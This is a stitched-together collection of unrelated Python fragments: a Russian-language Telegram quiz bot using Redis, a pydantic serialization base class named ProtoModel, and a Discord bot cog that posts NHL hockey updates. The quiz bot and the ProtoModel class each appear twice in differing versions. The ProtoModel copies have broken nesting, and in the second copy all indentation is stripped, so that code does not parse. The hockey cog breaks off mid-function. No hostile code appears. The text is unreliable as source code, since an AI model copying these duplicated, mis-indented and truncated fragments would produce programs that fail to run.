def handle_solution_attempt(update, _, quiz_qa, redis_connection):
    """Compare the user's reply with the stored answer for their question."""
    # Fixed f-string quoting (same-quote nesting is a pre-3.12 SyntaxError).
    quiz_question = redis_connection.get(
        f"tg-{update.message.from_user['id']}"
    ).decode('utf-8')
    message = 'Неправильно… Попробуешь ещё раз?'
    if update.message.text.lower() in quiz_qa[quiz_question].lower():
        update.message.reply_text(
            '''Правильно! Поздравляю!
Для следующего вопроса нажми «Новый вопрос»''')
        return QUIZ.Question
    update.message.reply_text(message)
def handle_give_up(update, context, quiz_qa, redis_connection):
    """Reveal the answer, then immediately ask a new question."""
    # Fixed f-string quoting (same-quote nesting is a pre-3.12 SyntaxError).
    quiz_question = redis_connection.get(
        f"tg-{update.message.from_user['id']}"
    ).decode('utf-8')
    answer = f'Ответ: {quiz_qa[quiz_question]}'
    update.message.reply_text(answer)
    handle_new_question_request(update, context, quiz_qa, redis_connection)
if __name__ == '__main__':
    # Configure logging verbosity from the CLI flags.
    arguments = get_arguments()
    level = logging.DEBUG if arguments.debug else logging.INFO
    logging.basicConfig(level=level)
    # Credentials and connection settings come from the environment (.env).
    load_dotenv()
    telegram_token = os.environ['TELEGRAM-TOKEN']
    redis_host = os.environ['REDIS-BASE']
    redis_port = os.environ['REDIS-PORT']
    redis_password = os.environ['REDIS-PASSWORD']
    logging.debug('Open Redis connection')
    # Redis stores the question currently asked to each Telegram user.
    redis_connection = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password
    )
    logging.debug(
        'Read questions and answers from files & make QA dictionary'
    )
    quiz_qa = get_quiz_qa('questions')
    logging.debug('Prepare telegram bot')
    updater = Updater(token=telegram_token)
    dispatcher = updater.dispatcher
    # Bind the shared QA dict and Redis connection into each handler.
    partial_handle_new_question_request = partial(
        handle_new_question_request,
        quiz_qa=quiz_qa,
        redis_connection=redis_connection,
    )
    partial_handle_solution_attempt = partial(
        handle_solution_attempt,
        quiz_qa=quiz_qa,
        redis_connection=redis_connection,
    )
    partial_handle_give_up = partial(
        handle_give_up,
        quiz_qa=quiz_qa,
        redis_connection=redis_connection,
    )
    # Quiz state machine: Question state hands out questions; Answer state
    # accepts either a surrender or a solution attempt.
    conversation_handler = ConversationHandler(
        entry_points=[CommandHandler('start', start)],
        states={
            QUIZ.Question: [
                MessageHandler(
                    Filters.regex('^(Новый вопрос)$'),
                    partial_handle_new_question_request
                )
            ],
            QUIZ.Answer: [
                MessageHandler(
                    Filters.regex('^(Сдаться)$'),
                    partial_handle_give_up
                ),
                MessageHandler(
                    Filters.text & ~Filters.command,
                    partial_handle_solution_attempt
                ),
            ]
        },
        fallbacks=[CommandHandler('cancel', cancel)]
    )
    dispatcher.add_handler(conversation_handler)
    logging.debug('Run telegram bot')
    updater.start_polling()
    updater.idle()
| import logging
import os
import random
import redis
import telegram
from dotenv import load_dotenv
from functools import partial
from bot_utils import get_arguments
from bot_utils import get_quiz_qa
from enum import Enum
from telegram.ext import ConversationHandler
from telegram.ext import CommandHandler
from telegram.ext import Filters
from telegram.ext import MessageHandler
from telegram.ext import Updater
# Conversation states: asking a question vs. awaiting the user's answer.
QUIZ = Enum('Quiz', 'Question Answer')
def start(update, _):
    """Greet the user, show the quiz keyboard, and enter the Question state."""
    custom_keyboard = [['Новый вопрос', 'Сдаться'], ['Мой счёт']]
    reply_markup = telegram.ReplyKeyboardMarkup(custom_keyboard)
    update.message.reply_text(
        'Привет. Готов к викторине? Начнем!',
        reply_markup=reply_markup
    )
    return QUIZ.Question
def cancel(update, _):
    """Say goodbye, remove the custom keyboard, and end the conversation."""
    update.message.reply_text(
        'Пока-пока!',
        reply_markup=telegram.ReplyKeyboardRemove()
    )
    return ConversationHandler.END
def handle_new_question_request(update, _, quiz_qa, redis_connection):
    """Ask a freshly chosen random question and store it per Telegram user."""
    question = random.choice(list(quiz_qa))
    user_key = f"tg-{update.message.from_user['id']}"
    redis_connection.set(user_key, question)
    update.message.reply_text(f'Вопрос: {question}')
    return QUIZ.Answer
def handle_solution_attempt(update, _, quiz_qa, redis_connection):
    """Check the user's reply against the stored answer for their question."""
    user_key = f"tg-{update.message.from_user['id']}"
    quiz_question = redis_connection.get(user_key).decode('utf-8')
    is_correct = update.message.text.lower() in quiz_qa[quiz_question].lower()
    if not is_correct:
        update.message.reply_text('Неправильно… Попробуешь ещё раз?')
        return
    update.message.reply_text(
        '''Правильно! Поздравляю!
Для следующего вопроса нажми «Новый вопрос»''')
    return QUIZ.Question
def handle_give_up(update, context, quiz_qa, redis_connection):
    """Show the stored answer, then hand out the next question."""
    user_key = f"tg-{update.message.from_user['id']}"
    stored_question = redis_connection.get(user_key).decode('utf-8')
    update.message.reply_text(f'Ответ: {quiz_qa[stored_question]}')
    handle_new_question_request(update, context, quiz_qa, redis_connection)
if __name__ == '__main__':
    # Configure logging verbosity from the CLI flags.
    arguments = get_arguments()
    level = logging.DEBUG if arguments.debug else logging.INFO
    logging.basicConfig(level=level)
    # Credentials and connection settings come from the environment (.env).
    load_dotenv()
    telegram_token = os.environ['TELEGRAM-TOKEN']
    redis_host = os.environ['REDIS-BASE']
    redis_port = os.environ['REDIS-PORT']
    redis_password = os.environ['REDIS-PASSWORD']
    logging.debug('Open Redis connection')
    # Redis stores the question currently asked to each Telegram user.
    redis_connection = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password
    )
    logging.debug(
        'Read questions and answers from files & make QA dictionary'
    )
    quiz_qa = get_quiz_qa('questions')
    logging.debug('Prepare telegram bot')
    updater = Updater(token=telegram_token)
    dispatcher = updater.dispatcher
    # Bind the shared QA dict and Redis connection into each handler.
    partial_handle_new_question_request = partial(
        handle_new_question_request,
        quiz_qa=quiz_qa,
        redis_connection=redis_connection,
    )
    partial_handle_solution_attempt = partial(
        handle_solution_attempt,
        quiz_qa=quiz_qa,
        redis_connection=redis_connection,
    )
    partial_handle_give_up = partial(
        handle_give_up,
        quiz_qa=quiz_qa,
        redis_connection=redis_connection,
    )
    # Quiz state machine: Question state hands out questions; Answer state
    # accepts either a surrender or a solution attempt.
    conversation_handler = ConversationHandler(
        entry_points=[CommandHandler('start', start)],
        states={
            QUIZ.Question: [
                MessageHandler(
                    Filters.regex('^(Новый вопрос)$'),
                    partial_handle_new_question_request
                )
            ],
            QUIZ.Answer: [
                MessageHandler(
                    Filters.regex('^(Сдаться)$'),
                    partial_handle_give_up
                ),
                MessageHandler(
                    Filters.text & ~Filters.command,
                    partial_handle_solution_attempt
                ),
            ]
        },
        fallbacks=[CommandHandler('cancel', cancel)]
    )
    dispatcher.add_handler(conversation_handler)
    logging.debug('Run telegram bot')
    updater.start_polling()
    updater.idle()
|
import json
from pathlib import Path
from typing import Any, Dict, Optional, Set, Union
import numpy
from pydantic import BaseModel, BaseSettings
from ..testing import compare_recursive
from ..util import deserialize, serialize, yaml_import
from ..util.autodocs import AutoPydanticDocGenerator
from ..util.decorators import classproperty
cmsschema_draft = "http://json-schema.org/draft-07/schema#"
__all__ = ["ProtoModel", "AutodocBaseSettings"]
class ProtoModel(BaseModel):
class Config:
    # Pydantic model configuration shared by all ProtoModel subclasses.
    allow_mutation: bool = False
    extra: str = "forbid"
    # Flatten numpy arrays to plain lists when emitting JSON.
    json_encoders: Dict[str, Any] = {numpy.ndarray: lambda v: v.flatten().tolist()}
    serialize_default_excludes: Set = set()
    serialize_skip_defaults: bool = False
    force_skip_defaults: bool = False

    def schema_extra(schema, model):
        # below addresses the draft issue until https://github.com/samuelcolvin/pydantic/issues/1478 .
        schema["$schema"] = cmsschema_draft
def __init_subclass__(cls, **kwargs) -> None:
    """Attach an auto-generated docstring to every ProtoModel subclass."""
    super().__init_subclass__(**kwargs)
    cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
def __repr__(self):
    # Fixed f-string: the ", " argument reused the enclosing single quotes,
    # a SyntaxError before Python 3.12.
    return f'{self.__repr_name__()}({self.__repr_str__(", ")})'
def __str__(self):
    # Fixed f-string: the ", " argument reused the enclosing single quotes,
    # a SyntaxError before Python 3.12.
    return f'{self.__repr_name__()}({self.__repr_str__(", ")})'
@classproperty
def default_schema_name(cls) -> Union[str, None]:
    """Returns default schema name if found."""
    try:
        # schema() may legitimately lack these keys; any failure means "unknown".
        return cls.schema()["properties"]["schema_name"]["default"]
    except Exception:
        return None
@classmethod
def parse_raw(cls, data: Union[bytes, str], *, encoding: str = None) -> "ProtoModel": # type: ignore
    """
    Parses raw string or bytes into a Model object.
    Parameters
    ----------
    data : Union[bytes, str]
        A serialized data blob to be deserialized into a Model.
    encoding : str, optional
        The type of the serialized array, available types are: {'json', 'json-ext', 'msgpack-ext', 'pickle'}
    Returns
    -------
    Model
        The requested model from a serialized format.
    """
    if encoding is None:
        # Infer the encoding from the value type: text defaults to JSON,
        # binary defaults to msgpack.
        if isinstance(data, str):
            encoding = "json" # Choose JSON over YAML by default
        elif isinstance(data, bytes):
            encoding = "msgpack-ext"
        else:
            raise TypeError(
                "Input is neither str nor bytes, please specify an encoding."
            )
    if encoding.endswith(("json", "javascript", "pickle")):
        # Formats pydantic can parse natively via content_type.
        return super().parse_raw(data, content_type=encoding)
    elif encoding in ["msgpack-ext", "json-ext", "yaml"]:
        # Project-specific formats go through the shared deserializer first.
        obj = deserialize(data, encoding)
    else:
        raise TypeError(f"Content type '{encoding}' not understood.")
    return cls.parse_obj(obj)
@classmethod
def parse_file(cls, path: Union[str, Path], *, encoding: str = None) -> "ProtoModel": # type: ignore
    """Parses a file into a Model object.
    Parameters
    ----------
    path : Union[str, Path]
        The path to the file.
    encoding : str, optional
        The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
        automatically infer the file type from the file extension if None.
    Returns
    -------
    Model
        The requested model from a file format.
    """
    path = Path(path)
    if encoding is None:
        # Infer the encoding from the file extension.
        # (Removed an unreachable duplicate of the .yaml/.yml branch.)
        if path.suffix in [".json", ".js"]:
            encoding = "json"
        elif path.suffix in [".yaml", ".yml"]:
            encoding = "yaml"
        elif path.suffix in [".msgpack"]:
            encoding = "msgpack-ext"
        elif path.suffix in [".pickle"]:
            encoding = "pickle"
        elif path.suffix in [".hdf5", ".h5"]:
            encoding = "hdf5"
        else:
            raise TypeError(
                "Could not infer `encoding`, please provide a `encoding` for this file."
            )
    if encoding == "yaml":
        # YAML must be read as text; everything else is handled as bytes.
        return cls.parse_raw(path.read_text(), encoding=encoding)
    elif encoding in ("hdf5", "h5"):
        from ..util import hdf
        return cls.parse_obj(hdf.read_file(path))
    return cls.parse_raw(path.read_bytes(), encoding=encoding)
def write_file(
    self,
    path: Union[str, Path],
    *,
    encoding: str = None,
    mode: str = "w",
    **kwargs: Optional[Dict[str, Any]],
):
    """Write a Model to an output file.
    Parameters
    ----------
    path : Union[str, Path]
        The path to the file.
    encoding : str, optional
        The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
        automatically infer the file type from the file extension if None.
    mode : str, optional
        An optional string that specifies the mode in which the file is written. Overwrites existing
        file by default (mode='w'). For appending to existing file, set mode='a'.
    **kwargs: Dict[str, Any], optional
        Additional keyword arguments passed to self.dict(), allows which fields to include, exclude, etc.
    """
    # Infer the encoding from the file suffix when not given explicitly.
    encoding = encoding or Path(path).suffix[1:]
    if encoding in ["json", "js", "yaml", "yml"]:
        stringified = self.serialize(encoding=encoding, **kwargs)
        with open(path, mode) as fp:
            fp.write(stringified)
    elif encoding in ["hdf5", "h5"]:
        from ..util import hdf
        hdf.write_file(path, data=self.dict(**kwargs), mode=mode)
    # NOTE(review): any other encoding (e.g. the 'msgpack'/'pickle' values the
    # docstring advertises) silently writes nothing — confirm whether this
    # should raise instead.
def dict(
    self, *, ser_kwargs: Dict[str, Any] = {}, **kwargs: Dict[str, Any]
) -> Dict[str, Any]:
    """Returns object fields as a dictionary.
    Parameters
    ----------
    ser_kwargs: Optional[Dict[str, Any]]
        Additional keyword arguments to pass to serialize.
    **kwargs: Optional[Dict[str, Any]]
        Additional keyword arguments, allow which fields to include, exclude, etc.
    Returns
    -------
    Dict[str, Any]
        Fields as a dictionary.
    """
    # Optional round-trip: encoding='json'/'yaml' re-parses the serialized
    # form so values come back as plain JSON/YAML types.
    encoding = kwargs.pop("encoding", None)
    # Always merge in the fields the Config marks as default-excluded.
    kwargs["exclude"] = (
        kwargs.get("exclude", None) or set()
    ) | self.__config__.serialize_default_excludes # type: ignore
    kwargs.setdefault("exclude_unset", self.__config__.serialize_skip_defaults) # type: ignore
    if self.__config__.force_skip_defaults: # type: ignore
        kwargs["exclude_unset"] = True
    data = super().dict(**kwargs)
    if encoding is None:
        return data
    elif encoding == "json":
        return json.loads(serialize(data, encoding=encoding, **ser_kwargs))
    elif encoding == "yaml":
        yaml = yaml_import(raise_error=True)
        return yaml.safe_load(serialize(data, encoding=encoding, **ser_kwargs))
    else:
        raise KeyError(
            f"Unknown encoding type '{encoding}', valid encoding types: 'json', 'yaml'."
        )
def serialize(
    self,
    encoding: str,
    *,
    include: Optional[Set[str]] = None,
    exclude: Optional[Set[str]] = None,
    exclude_unset: Optional[bool] = None,
    exclude_defaults: Optional[bool] = None,
    exclude_none: Optional[bool] = None,
    **kwargs: Optional[Dict[str, Any]],
) -> Union[bytes, str]:
    """Generate a serialized representation of the model.

    Parameters
    ----------
    encoding : str
        The serialization type, available types are: {'json', 'json-ext', 'msgpack-ext'}
    include : Optional[Set[str]], optional
        Fields to be included in the serialization.
    exclude : Optional[Set[str]], optional
        Fields to be excluded in the serialization.
    exclude_unset : Optional[bool], optional
        If True, skips fields that have default values provided.
    exclude_defaults: Optional[bool], optional
        If True, skips fields that have set or defaulted values equal to the default.
    exclude_none: Optional[bool], optional
        If True, skips fields that have value ``None``.
    **kwargs: Optional[Dict[str, Any]]
        Additional keyword arguments to pass to serialize.

    Returns
    -------
    Union[bytes, str]
        The serialized model.
    """
    # Forward only the field-selection options the caller actually set
    # (truthy), mirroring pydantic's defaults for the rest.
    field_options = {
        "include": include,
        "exclude": exclude,
        "exclude_unset": exclude_unset,
        "exclude_defaults": exclude_defaults,
        "exclude_none": exclude_none,
    }
    fdargs = {name: value for name, value in field_options.items() if value}
    data = self.dict(**fdargs)
    # Normalize shorthand encoding aliases before dispatching.
    aliases = {"js": "json", "yml": "yaml"}
    encoding = aliases.get(encoding, encoding)
    return serialize(data, encoding=encoding, **kwargs)
def json(self, **kwargs):
    """Serialize the model to a JSON string (routes through self.dict)."""
    # Alias JSON here from BaseModel to reflect dict changes
    return self.serialize("json", **kwargs)
def yaml(self, **kwargs):
    """Serialize the model to a YAML string via serialize()."""
    return self.serialize("yaml", **kwargs)
def compare(self, other: Union["ProtoModel", BaseModel], **kwargs) -> bool:
    """Compares the current object to the provided object recursively.
    Parameters
    ----------
    other : Model
        The model to compare to.
    **kwargs
        Additional kwargs to pass.
    Returns
    -------
    bool
        True if the objects match.
    """
    return compare_recursive(self, other, **kwargs)
class AutodocBaseSettings(BaseSettings):
    """Settings base class whose subclasses receive auto-generated docstrings."""

    def __init_subclass__(cls) -> None:
        # Consistency fix: chain to the parent hook like ProtoModel does,
        # so cooperative __init_subclass__ implementations still run.
        super().__init_subclass__()
        cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
| import json
from pathlib import Path
from typing import Any, Dict, Optional, Set, Union
import numpy
from pydantic import BaseModel, BaseSettings
from ..testing import compare_recursive
from ..util import deserialize, serialize, yaml_import
from ..util.autodocs import AutoPydanticDocGenerator
from ..util.decorators import classproperty
cmsschema_draft = "http://json-schema.org/draft-07/schema#"
__all__ = ["ProtoModel", "AutodocBaseSettings"]
class ProtoModel(BaseModel):
class Config:
allow_mutation: bool = False
extra: str = "forbid"
json_encoders: Dict[str, Any] = {numpy.ndarray: lambda v: v.flatten().tolist()}
serialize_default_excludes: Set = set()
serialize_skip_defaults: bool = False
force_skip_defaults: bool = False
def schema_extra(schema, model):
# below addresses the draft issue until https://github.com/samuelcolvin/pydantic/issues/1478 .
schema["$schema"] = cmsschema_draft
def __init_subclass__(cls, **kwargs) -> None:
super().__init_subclass__(**kwargs)
cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
def __repr__(self):
return f'{self.__repr_name__()}({self.__repr_str__(", ")})'
def __str__(self):
return f'{self.__repr_name__()}({self.__repr_str__(", ")})'
@classproperty
def default_schema_name(cls) -> Union[str, None]:
"""Returns default schema name if found."""
try:
return cls.schema()["properties"]["schema_name"]["default"]
except Exception:
return None
@classmethod
def parse_raw(cls, data: Union[bytes, str], *, encoding: str = None) -> "ProtoModel": # type: ignore
"""
Parses raw string or bytes into a Model object.
Parameters
----------
data : Union[bytes, str]
A serialized data blob to be deserialized into a Model.
encoding : str, optional
The type of the serialized array, available types are: {'json', 'json-ext', 'msgpack-ext', 'pickle'}
Returns
-------
Model
The requested model from a serialized format.
"""
if encoding is None:
if isinstance(data, str):
encoding = "json" # Choose JSON over YAML by default
elif isinstance(data, bytes):
encoding = "msgpack-ext"
else:
raise TypeError(
"Input is neither str nor bytes, please specify an encoding."
)
if encoding.endswith(("json", "javascript", "pickle")):
return super().parse_raw(data, content_type=encoding)
elif encoding in ["msgpack-ext", "json-ext", "yaml"]:
obj = deserialize(data, encoding)
else:
raise TypeError(f"Content type '{encoding}' not understood.")
return cls.parse_obj(obj)
@classmethod
def parse_file(cls, path: Union[str, Path], *, encoding: str = None) -> "ProtoModel": # type: ignore
"""Parses a file into a Model object.
Parameters
----------
path : Union[str, Path]
The path to the file.
encoding : str, optional
The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
automatically infer the file type from the file extension if None.
Returns
-------
Model
The requested model from a file format.
"""
path = Path(path)
if encoding is None:
if path.suffix in [".json", ".js"]:
encoding = "json"
elif path.suffix in [".yaml", ".yml"]:
encoding = "yaml"
elif path.suffix in [".msgpack"]:
encoding = "msgpack-ext"
elif path.suffix in [".pickle"]:
encoding = "pickle"
elif path.suffix in [".yaml", ".yml"]:
encoding = "yaml"
elif path.suffix in [".hdf5", ".h5"]:
encoding = "hdf5"
else:
raise TypeError(
"Could not infer `encoding`, please provide a `encoding` for this file."
)
if encoding == "yaml":
return cls.parse_raw(path.read_text(), encoding=encoding)
elif encoding in ("hdf5", "h5"):
from ..util import hdf
return cls.parse_obj(hdf.read_file(path))
return cls.parse_raw(path.read_bytes(), encoding=encoding)
def write_file(
self,
path: Union[str, Path],
*,
encoding: str = None,
mode: str = "w",
**kwargs: Optional[Dict[str, Any]],
):
"""Write a Model to an output file.
Parameters
----------
path : Union[str, Path]
The path to the file.
encoding : str, optional
The type of the files, available types are: {'json', 'msgpack', 'pickle', 'hdf5'}. Attempts to
automatically infer the file type from the file extension if None.
mode : str, optional
An optional string that specifies the mode in which the file is written. Overwrites existing
file by default (mode='w'). For appending to existing file, set mode='a'.
**kwargs: Dict[str, Any], optional
Additional keyword arguments passed to self.dict(), allows which fields to include, exclude, etc.
"""
encoding = encoding or Path(path).suffix[1:]
if encoding in ["json", "js", "yaml", "yml"]:
stringified = self.serialize(encoding=encoding, **kwargs)
with open(path, mode) as fp:
fp.write(stringified)
elif encoding in ["hdf5", "h5"]:
from ..util import hdf
hdf.write_file(path, data=self.dict(**kwargs), mode=mode)
def dict(
self, *, ser_kwargs: Dict[str, Any] = {}, **kwargs: Dict[str, Any]
) -> Dict[str, Any]:
"""Returns object fields as a dictionary.
Parameters
----------
ser_kwargs: Optional[Dict[str, Any]]
Additional keyword arguments to pass to serialize.
**kwargs: Optional[Dict[str, Any]]
Additional keyword arguments, allow which fields to include, exclude, etc.
Returns
-------
Dict[str, Any]
Fields as a dictionary.
"""
encoding = kwargs.pop("encoding", None)
kwargs["exclude"] = (
kwargs.get("exclude", None) or set()
) | self.__config__.serialize_default_excludes # type: ignore
kwargs.setdefault("exclude_unset", self.__config__.serialize_skip_defaults) # type: ignore
if self.__config__.force_skip_defaults: # type: ignore
kwargs["exclude_unset"] = True
data = super().dict(**kwargs)
if encoding is None:
return data
elif encoding == "json":
return json.loads(serialize(data, encoding=encoding, **ser_kwargs))
elif encoding == "yaml":
yaml = yaml_import(raise_error=True)
return yaml.safe_load(serialize(data, encoding=encoding, **ser_kwargs))
else:
raise KeyError(
f"Unknown encoding type '{encoding}', valid encoding types: 'json', 'yaml'."
)
def serialize(
self,
encoding: str,
*,
include: Optional[Set[str]] = None,
exclude: Optional[Set[str]] = None,
exclude_unset: Optional[bool] = None,
exclude_defaults: Optional[bool] = None,
exclude_none: Optional[bool] = None,
**kwargs: Optional[Dict[str, Any]],
) -> Union[bytes, str]:
"""Generates a serialized representation of the model
Parameters
----------
encoding : str
The serialization type, available types are: {'json', 'json-ext', 'msgpack-ext'}
include : Optional[Set[str]], optional
Fields to be included in the serialization.
exclude : Optional[Set[str]], optional
Fields to be excluded in the serialization.
exclude_unset : Optional[bool], optional
If True, skips fields that have default values provided.
exclude_defaults: Optional[bool], optional
If True, skips fields that have set or defaulted values equal to the default.
exclude_none: Optional[bool], optional
If True, skips fields that have value ``None``.
**kwargs: Optional[Dict[str, Any]]
Additional keyword arguments to pass to serialize.
Returns
-------
Union[bytes, str]
The serialized model.
"""
fdargs = {}
if include:
fdargs["include"] = include
if exclude:
fdargs["exclude"] = exclude
if exclude_unset:
fdargs["exclude_unset"] = exclude_unset
if exclude_defaults:
fdargs["exclude_defaults"] = exclude_defaults
if exclude_none:
fdargs["exclude_none"] = exclude_none
data = self.dict(**fdargs)
if encoding == "js":
encoding = "json"
elif encoding == "yml":
encoding = "yaml"
return serialize(data, encoding=encoding, **kwargs)
def json(self, **kwargs):
# Alias JSON here from BaseModel to reflect dict changes
return self.serialize("json", **kwargs)
def yaml(self, **kwargs):
return self.serialize("yaml", **kwargs)
    def compare(self, other: Union["ProtoModel", BaseModel], **kwargs) -> bool:
        """Compares the current object to the provided object recursively.

        Parameters
        ----------
        other : Model
            The model to compare to.
        **kwargs
            Additional kwargs to pass.

        Returns
        -------
        bool
            True if the objects match.
        """
        # Thin delegation: the field-by-field walk lives in compare_recursive.
        return compare_recursive(self, other, **kwargs)
class AutodocBaseSettings(BaseSettings):
    # Every subclass gets its __doc__ replaced by an auto-generated,
    # pydantic-aware docstring at class-creation time.
    def __init_subclass__(cls) -> None:
        cls.__doc__ = AutoPydanticDocGenerator(cls, always_apply=True)
|
import discord
import aiohttp
import asyncio
import json
import yaml
import logging
from datetime import datetime, timedelta
from io import BytesIO
from urllib.parse import quote
from redbot.core import commands, checks, Config
from redbot.core.data_manager import cog_data_path
from redbot.core.i18n import Translator, cog_i18n
from .teamentry import TeamEntry
from .menu import hockey_menu
from .embeds import *
from .helper import *
from .errors import *
from .game import Game
from .pickems import Pickems
from .standings import Standings
from .gamedaychannels import GameDayChannels
from .constants import *
# Optional integration: the Oilers goal-light module may be absent; catch
# ImportError specifically instead of a bare except that would also hide
# real errors raised while importing the module.
try:
    from .oilers import Oilers

    LIGHTS_SET = True
except ImportError:
    LIGHTS_SET = False

_ = Translator("Hockey", __file__)
log = logging.getLogger("red.Hockey")

__version__ = "2.3.2"
__author__ = "TrustyJAID"
@cog_i18n(_)
class Hockey(getattr(commands, "Cog", object)):
"""
Gather information and post goal updates for NHL hockey teams
"""
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession(loop=self.bot.loop)
default_global = {"teams": [], "created_gdc": False, "print": False}
for team in TEAMS:
team_entry = TeamEntry("Null", team, 0, [], {}, [], "")
default_global["teams"].append(team_entry.to_json())
default_global["teams"].append(team_entry.to_json())
default_guild = {
"standings_channel": None,
"standings_type": None,
"post_standings": False,
"standings_msg": None,
"create_channels": False,
"category": None,
"gdc_team": None,
"gdc": [],
"delete_gdc": True,
"rules": "",
"team_rules": "",
"pickems": [],
"leaderboard": {},
}
default_channel = {"team": [], "to_delete": False}
self.config = Config.get_conf(self, CONFIG_ID)
self.config.register_global(**default_global, force_registration=True)
self.config.register_guild(**default_guild)
self.config.register_channel(**default_channel)
self.loop = bot.loop.create_task(self.game_check_loop())
self.TEST_LOOP = False # used to test a continuous loop of a single game data
##############################################################################
# Here is all the logic for gathering game data and updating information
    async def game_check_loop(self):
        """
        This loop grabs the current games for the day
        then passes off to other functions as necessary

        Runs for as long as this cog instance is the loaded "Hockey" cog:
        fetches today's schedule, polls every unfinished game once a minute,
        and sleeps 5 minutes between schedule refreshes.
        """
        await self.bot.wait_until_ready()
        # Stops automatically when the cog is reloaded/unloaded (a new
        # instance replaces this one in bot.get_cog).
        while self is self.bot.get_cog("Hockey"):
            # await self.refactor_data()
            async with self.session.get(BASE_URL + "/api/v1/schedule") as resp:
                data = await resp.json()
            if data["dates"] != []:
                # Collect API links for every game today that isn't finished.
                games = [
                    game["link"]
                    for game in data["dates"][0]["games"]
                    if game["status"]["abstractGameState"] != "Final"
                ]
            else:
                games = []
            # Only try to create game day channels if there's no games for the day
            # Otherwise make the game day channels once we see
            # the first preview message to delete old ones
            await self.check_new_day()
            games_playing = False
            if self.TEST_LOOP:
                # Sentinel value so the inner loop runs once against testgame.json.
                games = [1]
            while games != []:
                to_remove = []
                games_playing = True
                for link in games:
                    if not self.TEST_LOOP:
                        try:
                            async with self.session.get(BASE_URL + link) as resp:
                                data = await resp.json()
                        except Exception as e:
                            # Best-effort: skip this game this cycle on network errors.
                            log.error(_("Error grabbing game data: "), exc_info=True)
                            continue
                    else:
                        games_playing = False
                        # __file__[:-9] strips "hockey.py" to locate the fixture.
                        with open(str(__file__)[:-9] + "testgame.json", "r") as infile:
                            data = json.loads(infile.read())
                    game = await Game.from_json(data)
                    try:
                        await self.check_new_day()
                        await game.check_game_state(self.bot)
                    except Exception as e:
                        log.error("Error checking game state: ", exc_info=True)
                    log.debug(
                        (
                            f"{game.away_team} @ {game.home_team} "
                            f"{game.game_state} {game.away_score} - {game.home_score}"
                        )
                    )
                    if game.game_state == "Final" and game.first_star is not None:
                        # Game is truly over (first star assigned): settle pickems
                        # and stop polling this link.
                        try:
                            await Pickems.set_guild_pickem_winner(self.bot, game)
                        except Exception as e:
                            log.error(_("Pickems Set Winner error: "), exc_info=True)
                        to_remove.append(link)
                for link in to_remove:
                    games.remove(link)
                await asyncio.sleep(60)
            log.debug(_("Games Done Playing"))
            try:
                await Pickems.tally_leaderboard(self.bot)
            except Exception as e:
                log.error(_("Error tallying leaderboard:"), exc_info=True)
                pass
            if games_playing:
                # Allow check_new_day to rebuild game day channels tomorrow.
                await self.config.created_gdc.set(False)
            # Final cleanup of config incase something went wrong
            # Should be mostly unnecessary at this point
            all_teams = await self.config.teams()
            for team in await self.config.teams():
                all_teams.remove(team)
                team["goal_id"] = {}
                team["game_state"] = "Null"
                team["game_start"] = ""
                team["period"] = 0
                all_teams.append(team)
            await self.config.teams.set(all_teams)
            await asyncio.sleep(300)
    async def check_new_day(self):
        """Run once-per-day housekeeping the first time it's needed each day.

        Guarded by the ``created_gdc`` flag (reset by game_check_loop after a
        day with games): resets weekly pickems on Sundays, posts automatic
        standings, and recreates game day channels.
        """
        if not await self.config.created_gdc():
            # weekday() == 6 is Sunday: reset the weekly pickems leaderboard.
            if datetime.now().weekday() == 6:
                try:
                    await Pickems.reset_weekly(self.bot)
                except Exception as e:
                    log.error(_("Error reseting the weekly leaderboard: "), exc_info=True)
            try:
                await Standings.post_automatic_standings(self.bot)
            except Exception as e:
                log.error("Error updating standings", exc_info=True)
            log.debug(_("Checking GDC"))
            await GameDayChannels.check_new_gdc(self.bot)
            # Mark done so this only runs once per day.
            await self.config.created_gdc.set(True)
async def on_raw_reaction_add(self, payload):
channel = self.bot.get_channel(id=payload.channel_id)
try:
guild = channel.guild
except:
return
pickems_list = await self.config.guild(guild).pickems()
if pickems_list is None:
return
pickems = [Pickems.from_json(p) for p in pickems_list]
if len(pickems) == 0:
return
try:
msg = await channel.get_message(id=payload.message_id)
except:
return
user = guild.get_member(payload.user_id)
# log.debug(payload.user_id)
if user.bot:
return
is_pickems_vote = False
for pickem in pickems:
if msg.id in pickem.message:
is_pickems_vote = True
reply_message = ""
try:
# log.debug(payload.emoji)
pickem.add_vote(user.id, payload.emoji)
except UserHasVotedError as team:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
emoji = (
pickem.home_emoji
if str(payload.emoji.id) in pickem.away_emoji
else pickem.away_emoji
)
await msg.remove_reaction(emoji, user)
reply_message = _("You have already voted! Changing vote to) ") + str(team)
except VotingHasEndedError as error_msg:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
await msg.remove_reaction(payload.emoji, user)
reply_message = _("Voting has ended!") + str(error_msg)
except NotAValidTeamError:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
await msg.remove_reaction(payload.emoji, user)
reply_message = _("Don't clutter the voting message with emojis!")
if reply_message != "":
try:
await user.send(reply_message)
except:
pass
if is_pickems_vote:
pickems_list = [p.to_json() for p in pickems]
await self.config.guild(guild).pickems.set(pickems_list)
async def change_custom_emojis(self, attachments):
"""
This overwrites the emojis in constants.py
with values in a properly formatted .yaml file
"""
try:
async with self.session.get(attachments[0].url) as infile:
data = yaml.safe_load(await infile.read())
except yaml.error.YAMLError as exc:
raise InvalidFileError("Error Parsing the YAML") from exc
new_dict = {}
for team in TEAMS:
TEAMS[team]["emoji"] = data[team][0] if data[team][0] is not None else data["Other"][0]
team_data = json.dumps(TEAMS, indent=4, sort_keys=True, separators=(",", " : "))
constants_string = (
f'BASE_URL = "{BASE_URL}"\n'
f'HEADSHOT_URL = "{HEADSHOT_URL}"\n'
f"CONFIG_ID = {CONFIG_ID}\n"
f"TEAMS = {team_data}"
)
with open(__file__[:-9] + "constants.py", "w") as outfile:
outfile.write(constants_string)
async def wait_for_file(self, ctx):
"""
Waits for the author to upload a file
"""
msg = None
while msg is None:
